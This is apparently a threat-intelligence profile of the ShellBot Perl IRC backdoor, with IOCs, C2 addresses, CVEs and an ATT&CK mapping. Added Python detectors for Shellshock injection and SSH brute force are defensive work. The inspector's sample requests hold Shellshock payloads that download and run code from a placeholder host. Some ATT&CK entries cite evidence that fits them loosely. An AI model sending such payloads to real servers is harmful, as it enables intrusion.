Mallory
Malware | Used by 1 actor | Exploits 5 CVEs

ShellBot

ShellBot is a Perl-based Linux bot/backdoor, commonly described as an IRC bot with remote shell, scanning, and DDoS functionality. The reporting collected here ties it to brute-force and dictionary attacks against weakly secured Linux SSH servers: attackers scan for exposed SSH services, log in with weak credentials, and install the bot. Once deployed, ShellBot connects to its command-and-control infrastructure over IRC, from which operators issue commands, steal data, and launch DDoS attacks. It persists by modifying startup scripts or adding cron jobs; one report notes a variant that disguised itself as an rsync process and was set up to survive reboots through cron entries. ShellBot is also described as highly customizable, with named variants including "LiGhT’s Modded perlbot v2."

The malware appears in multiple Linux-focused intrusion contexts in the source material. ASEC reported on March 13, 2023 that ShellBot was actively targeting Linux SSH servers. It is also listed among the DDoS bot families observed in honeypot telemetry against Linux SSH infrastructure in Q3 2025 and Q1 2026. Separate reporting links ShellBot delivery to exploitation of internet-exposed Cacti servers via CVE-2022-46169, and the 2014 Shellshock exploitation wave also delivered ShellBot-related Perl payloads. The Outlaw group’s Linux/Unix botnet toolkit used a Perl-obfuscated installer for a Shellbot backdoor, with the bot disguising itself as rsync on infected systems.

High-confidence indicators mentioned in the content:

Perl ShellBot sample, MD5 cd23ef54e264bd84ab1a12dddceb3f48, described as connecting to 81.18.135.38 on port 443
Perl script, MD5 b0b8a35445a4743ff6f196a4c0bba688, connecting to 94.102.52.10 on port 6667

SHA-256 sample hashes:
2220783661db230d0808a5750060950688e2618d462ccbe07f54408154c227c1
b7d62d1a145ddda241e624ef94ab31fcca1a13f79e130d0a704586e35745282a
e476b9c07fcd80824d4eafce0e826ae1c12706ca6215eb6e3995468374bb8a76
f5a26a68344c1ffd136ba73dec9d08f61212872cdba33bd4d7d32733a72e4ed5
0857f90be97326ff45f17ec3f6ce60d9a0f6d8faed34e48527fde5ec30bd5a0d
0c1673e442b945a0aecf60d3970e924b16bd72d46e257bd72927821e4ebbc9ca
1f3c279ea684d5cbdc7004819bf15a160f70b2c79c4affd309f9ab3ad957045b
5ba1d0efb313ccc20e3d5f2476a3db811e15c80c3f1ac73b7a02d80c5c49c728
a26de5b607e3a66af8b7db2c13bcd1c658817649c699f8731db6f237c3c5b1ce
cb80570332e3e32037f426e835d05bdcd276e9e5acfd439027d788dd64dcb47d


EXPLOITED CVES

Vulnerabilities exploited: 5 CVEs Mallory has correlated with this family across public research and vendor advisories.
CVE-2014-6271 | Shellshock | Exploited in the wild

The exploitation of the BASH bug, now widely referred to as “Shellshock”, is in full swing... The initial patch for this vulnerability (CVE-2014-6271), which was released in sync with the vulnerability’s public disclosure, was quickly found to be inadequate. | The Perl script (md5: cd23ef54e264bd84ab1a12dddceb3f48) was first submitted to VirusTotal over a year ago and is known as ShellBot. It is an IRC bot with remote shell, scanning, and DDoS functionality.

via fireeye.com
CVE-2016-5195 | Dirty COW | Exploited in the wild

This time, the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit (CVE-2016-5195) as attack vectors.

via trendmicro.com
CVE-2016-8655 | Privilege escalation via race condition in Linux kernel AF_PACKET | Exploited in the wild

This time, the group explored unpatched systems vulnerable to CVE-2016-8655 ... as attack vectors.

via trendmicro.com
CVE-2014-7169 | Shellshock incomplete fix in GNU Bash

The Perl script (md5: cd23ef54e264bd84ab1a12dddceb3f48) was first submitted to VirusTotal over a year ago and is known as ShellBot. It is an IRC bot with remote shell, scanning, and DDoS functionality.

via fireeye.com
CVE-2022-46169 | Unauthenticated command injection in Cacti remote_agent.php | Exploited in the wild

"...allowing threat actors to breach internet-exposed Cacti servers to deliver botnet malware such as MooBot and ShellBot."

via thehackernews.com
THREAT ACTORS

Groups observed using it: 1 distinct threat actor attributed by public researchers.
Outlaw

The a binary is a script wrapper to start run, a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system. The Shellbot disguises itself as a process named rsync... Shellbot is also used to control the botnet...

via trendmicro.com
MITRE ATT&CK

Techniques & procedures: 16 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access (2 techniques)

T1078 | Valid Accounts | Evidence: 1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1190 | Exploit Public-Facing Application | Evidence: 1

"In early 2023, a third critical flaw tracked as CVE-2022-46169 ... came under active exploitation in the wild, allowing threat actors to breach internet-exposed Cacti servers to deliver botnet malware such as MooBot and ShellBot."

Execution (3 techniques)

T1053.003 | Cron | Evidence: 2

It then resets cron and removes possible cache files from other programs, starts scripts and binaries a, init0, and start, and sets the persistence by modifying the crontab.

T1059.004 | Unix Shell | Evidence: 2

The a binary is a script wrapper to start run, a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system.

T1059.006 | Python | Evidence: 1

The a binary is a script wrapper to start run, a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system.

Persistence (3 techniques)

T1037 | Boot or Logon Initialization Scripts | Evidence: 1

After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.

T1053.003 | Cron | Evidence: 2

It then resets cron and removes possible cache files from other programs, starts scripts and binaries a, init0, and start, and sets the persistence by modifying the crontab.

T1078 | Valid Accounts | Evidence: 1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

Privilege Escalation (3 techniques)

T1037 | Boot or Logon Initialization Scripts | Evidence: 1

After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.

T1053.003 | Cron | Evidence: 2

It then resets cron and removes possible cache files from other programs, starts scripts and binaries a, init0, and start, and sets the persistence by modifying the crontab.

T1078 | Valid Accounts | Evidence: 1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

Stealth (3 techniques)

T1027 | Obfuscated Files or Information | Evidence: 1

The commands above Base64 decode the initial string into the following python code below and execute it with Python.

T1036 | Masquerading | Evidence: 1

The Shellbot disguises itself as a process named rsync, commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization.

T1078 | Valid Accounts | Evidence: 1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

Defense Impairment (1 technique)

T1222 | File and Directory Permissions Modification | Evidence: 1

The injected BASH commands above download a file, change its permissions to read/write/execute for all users, and executes the file... chmod 777 /tmp/besh
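The FireEye evidence quoted above (the Shellshock CVE rows and this T1222 entry) describes the same dropper chain in each injected request: download a file into /tmp, chmod 777 it, run it. The following is an added example, not code from the page or from FireEye, that recognises the `() { ... };` prefix in any request header and extracts the URLs and staging paths from the trailing command. The three requests, host names and addresses are constructed for the example; the command in them mirrors the quoted download / chmod / execute sequence but is not a real captured payload.

```python
"""Spot Shellshock-style injection in raw HTTP requests and pull out the
dropper chain (download URL, staging path, chmod) from the injected command.

Added example; not code from the page or from FireEye. The three requests are
constructed for the example, with documentation-range addresses; the command
in them mirrors the download / chmod 777 / execute sequence quoted above but
is not a real captured payload.
"""
import re
from typing import Dict, List, Tuple

# A value that starts a Bash function definition followed by trailing
# commands after the closing brace: the CVE-2014-6271 pattern.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)")
URL_RE = re.compile(r"https?://[^\s\"';|&]+")
# Paths in world-writable staging dirs that the command writes to or chmods.
STAGE_RE = re.compile(
    r"(?:chmod\s+\S+\s+|-O\s+|>\s*)(?P<path>/(?:tmp|var/tmp|dev/shm)/[^\s;\"']+)"
)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only; URLs keep theirs
        headers[name.strip()] = value.strip()
    return method, target, headers


def inspect(raw: str) -> List[dict]:
    """Return one finding per header carrying a Shellshock payload. Every
    header is checked, not just User-Agent, because CGI exports all of them
    as environment variables and any of them can reach bash."""
    _method, target, headers = parse_request(raw)
    findings = []
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if not m:
            continue
        cmd = m["cmd"]
        findings.append({
            "target": target,
            "header": name,
            "command": cmd,
            "urls": URL_RE.findall(cmd),
            "staged": sorted(set(STAGE_RE.findall(cmd))),
        })
    return findings


def _req(lines: List[str]) -> str:
    return "\r\n".join(lines) + "\r\n\r\n"


# Constructed sample requests (not captured traffic).
REQUESTS = [
    _req(["GET /cgi-bin/status.cgi HTTP/1.1", "Host: www.example.com",
          "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/32.0"]),
    _req(["GET /cgi-bin/status.cgi HTTP/1.1", "Host: www.example.com",
          'User-Agent: () { :;}; /bin/bash -c "wget http://203.0.113.10/besh -O /tmp/besh; '
          'chmod 777 /tmp/besh; /tmp/besh"']),
    _req(["GET /cgi-bin/status.cgi HTTP/1.1", "Host: www.example.com",
          "User-Agent: curl/7.38.0",
          'Cookie: () { :; }; /bin/bash -c "curl -s http://203.0.113.10/x.pl | perl"']),
]

if __name__ == "__main__":
    for raw in REQUESTS:
        for f in inspect(raw):
            print(f"{f['header']} -> {f['target']}: urls={f['urls']} staged={f['staged']}")
```

The extracted URLs and staging paths are what you pivot on next: the URL host is a download-server indicator to block and hunt for in proxy logs, and the /tmp path is what to look for on the web server itself. Checking every header matters because a combined-format access log only preserves User-Agent and Referer, so a payload in Cookie or a custom header is invisible there; this is why the example parses the raw request rather than the access log line.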

Credential Access (1 technique)

T1110 | Brute Force | Evidence: 1

The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty."
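Brute force followed by a successful password login is the entry point the ASEC reporting describes, and it is visible in sshd's own log lines before any bot is dropped. The detector below is an added example, not code from the page or from ASEC: it keeps a sliding window of failed logins per source address, raises one alert when a source crosses the threshold and a second when a password login is accepted from a source still over it. The log lines, host name and addresses are constructed for the example, and the year is assumed because syslog timestamps omit it.

```python
"""Detect the SSH brute-force pattern described above in sshd syslog lines and
flag a password login that follows a burst of failures from the same source.

Added example; not code from the page or from ASEC. The log lines below are
constructed for the example; the line format is the standard OpenSSH syslog
format ("Failed password for ..." / "Accepted password for ..."), and the
year is assumed because syslog timestamps omit it.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Iterable, List, Optional, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)


def parse(line: str, year: int) -> Optional[Tuple[datetime, str, str, str, str]]:
    m = LINE_RE.match(line)
    if not m:
        return None                      # pam_unix noise, disconnects, etc.
    ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}",
                           "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["method"], m["user"], m["ip"]


def detect(lines: Iterable[str], window_s: int = 300, threshold: int = 5,
           year: int = 2023) -> List[Tuple[str, str, str]]:
    """Return (kind, ip, user) alerts in log order.

    'bruteforce' fires once when a source reaches `threshold` failed logins
    inside a sliding window of `window_s` seconds; 'compromise' fires when a
    password login is accepted from a source that is still over the threshold,
    which is the point at which the ShellBot install would begin."""
    failures = defaultdict(deque)        # ip -> timestamps of recent failures
    alerts: List[Tuple[str, str, str]] = []
    for line in lines:
        rec = parse(line, year)
        if rec is None:
            continue
        ts, result, method, user, ip = rec
        q = failures[ip]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()                  # expire failures outside the window
        if result == "Failed":
            q.append(ts)
            if len(q) == threshold:      # alert once, not on every extra failure
                alerts.append(("bruteforce", ip, user))
        elif result == "Accepted" and method == "password" and len(q) >= threshold:
            alerts.append(("compromise", ip, user))
    return alerts


# Constructed sample log (host and addresses are documentation values).
SAMPLE_LOG = """\
Mar 13 04:12:01 web1 sshd[1203]: Failed password for root from 198.51.100.7 port 51234 ssh2
Mar 13 04:12:03 web1 sshd[1205]: Failed password for invalid user admin from 198.51.100.7 port 51240 ssh2
Mar 13 04:12:04 web1 sshd[1205]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.51.100.7
Mar 13 04:12:06 web1 sshd[1207]: Failed password for root from 198.51.100.7 port 51244 ssh2
Mar 13 04:12:09 web1 sshd[1209]: Failed password for invalid user oracle from 198.51.100.7 port 51250 ssh2
Mar 13 04:12:12 web1 sshd[1211]: Failed password for root from 198.51.100.7 port 51256 ssh2
Mar 13 04:12:15 web1 sshd[1213]: Failed password for root from 198.51.100.7 port 51262 ssh2
Mar 13 04:12:20 web1 sshd[1215]: Accepted password for root from 198.51.100.7 port 51270 ssh2
Mar 13 04:15:40 web1 sshd[1301]: Failed password for deploy from 192.0.2.5 port 40022 ssh2
Mar 13 04:15:52 web1 sshd[1303]: Accepted publickey for deploy from 192.0.2.5 port 40024 ssh2
"""

if __name__ == "__main__":
    for kind, ip, user in detect(SAMPLE_LOG.splitlines()):
        print(f"{kind}: {ip} user={user}")
```

The single mistyped password from 192.0.2.5 followed by a key-based login stays quiet; the burst from 198.51.100.7 produces one bruteforce alert at the fifth failure and a compromise alert when the password login lands. The compromise alert is the one to page on: a brute-force source that got in is exactly the host where the next events are the download and cron changes described elsewhere on this page.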

Lateral Movement (1 technique)

T1021.004 | SSH | Evidence: 1

SuperShell is a sophisticated backdoor malware targeting Linux SSH servers... The attack begins with brute force and dictionary attacks against SSH servers...

Command and Control (3 techniques)

T1071.001 | Web Protocols | Evidence: 2

Tsunami/Kaiten... mainly functions as a DDoS client, but also has backdoor capabilities, communicating over IRC... ShellBot... It is an IRC bot with remote shell, scanning, and DDoS functionality.

T1105 | Ingress Tool Transfer | Evidence: 4

Cowrie doesn't just log commands; it also captures the files that get uploaded to it... All seven bots "downloaded" the same file onto my server... The fingerprint of all seven uploads turned out to be identical: a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2

T1219 | Remote Access Tools | Evidence: 1

The Shellbot script is added to run after the victim’s system reboots... Shellbot is also used to control the botnet...

Impact (2 techniques)

T1498 | Network Denial of Service | Evidence: 1

Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.

T1499 | Endpoint Denial of Service | Evidence: 1

We have observed a significant amount of overtly malicious traffic leveraging BASH, including... DDoS... The idea here is to convert exploited Web servers into on-demand DDoS clients.

INDICATORS OF COMPROMISE

IOCs tracked for this family: 49 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Network: 32 tracked (IPs, domains, and DNS infrastructure linked to this family)
Hashes: 15 tracked (file hashes, MD5, SHA-1 and SHA-256, from samples and reports)
Other: 2 tracked (other indicator types observed in public reporting)
